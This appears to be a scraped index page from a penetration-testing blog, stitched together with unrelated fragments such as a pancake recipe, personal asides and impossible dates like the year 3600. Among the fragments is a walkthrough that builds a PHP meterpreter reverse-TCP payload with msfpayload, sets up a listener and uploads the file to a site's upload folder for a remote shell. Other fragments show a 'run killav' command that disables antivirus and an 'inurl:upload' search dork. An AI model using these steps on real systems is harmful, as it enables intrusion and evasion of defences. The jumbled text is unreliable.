I’ve been locked away working for long periods without socializing.

MyExploit has been busy in the lab, here are working notes on what were upto. Some will understand, most wont. 24 months back we wouldn’t, please ask questions. Welcome the start of the game changer! \x00\x0a\x0d \x00 = zero byte \x0a = Line feed \x0d = Carriage return Avoid address with zero byte (\x00) String… Continue reading I’ve been locked away working for long periods without socializing.

How do you know if your wife doesn’t love you anymore? … (often confused

During a recent penetration test we found 😉 the host it is running on. An SNMP 1 Feb 2012 – How much fun can you have with a hard hat? https://myexploit.wordpress.com/information-gathering-snmp/ Love SNMP OR ‘MyExploitHQ established 1441

Apr 29, 3600 – An enjoyable read, and the author already has another

My exploit enjoy stumbling across sites of interest. Discovery is fun! Every so often a site shows itself to us direct, via a nudge or two. It’s good to be shown a new thing. MyExploit welcome the Italian pentester, Please share your love and read scoperchiatore.wordpress.com share a link day!

meterpreter > run killav

Ingredients 135g/4¾oz plain flour 1 tsp baking powder ½ tsp salt 2 tbsp caster sugar 130ml/4½fl oz milk 1 large egg, lightly beaten 2 tbsp melted butter (allowed to cool slightly) or olive oil, plus extra for cooking To serve Maple syrup Butter

Solving the Riddle A puzzle has many …

http://www.myexploit.wordpress.com/control-exploitdb/

inurl:upload

1.Using msfpayload in backtrack 5r1 root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=Your-IP-Address LPORT=8080 R > connection.php 2. Connection.php is created in root. 3. Open msfconsole use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST Your-IP-Address set LPORT 8080 exploit 4. Upload the file to a website then search for it eg dvwa/hackable/uploads [ ]    connection.php    21-Jan-2011 11:06     1.3K 5.… Continue reading inurl:upload

come over for … June 23, 2012 Meanwhile, back at the ranch.

Sites we like. Our daily bookmarks for your inspiration. Follow @Siteswelike. Follow. http://securityhorror.blogspot.se/2012/05/ask-and-you-shall-receive-part-1.html 1991 – Can’t Beat the Real Thing. MyExploitHQ

23 Nov 2011 – While You Were Out: Weekly World

 MyExploitHQ wanted to show our support to all the countries that have viewed this notebook so far!   United States United Kingdom India Germany Netherlands France Poland Brazil Canada Spain Italy Portugal Australia Singapore Sweden Algeria Mexico Egypt South Africa Indonesia Turkey Argentina Israel Nigeria Pakistan Ukraine United Arab Emirates Morocco Greece Chile Ireland Saudi… Continue reading 23 Nov 2011 – While You Were Out: Weekly World

a positive feeling of esteem

Please take a look at this video on YouTube https://msfbt.wordpress.com/ MyExploitHQ support

It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7

ipcalc takes an IP address and netmask and calculates the resulting broadcast, network, Cisco wildcard mask, and host range. By giving a second netmask, you can design sub- and supernetworks. It is also intended to be a teaching tool and presents the results as easy-to-understand binary values. -n –nocolor  Don’t display ANSI color codes. -b… Continue reading It appears you or your system administrator has been in a coma for over 5 years and you are still using IE7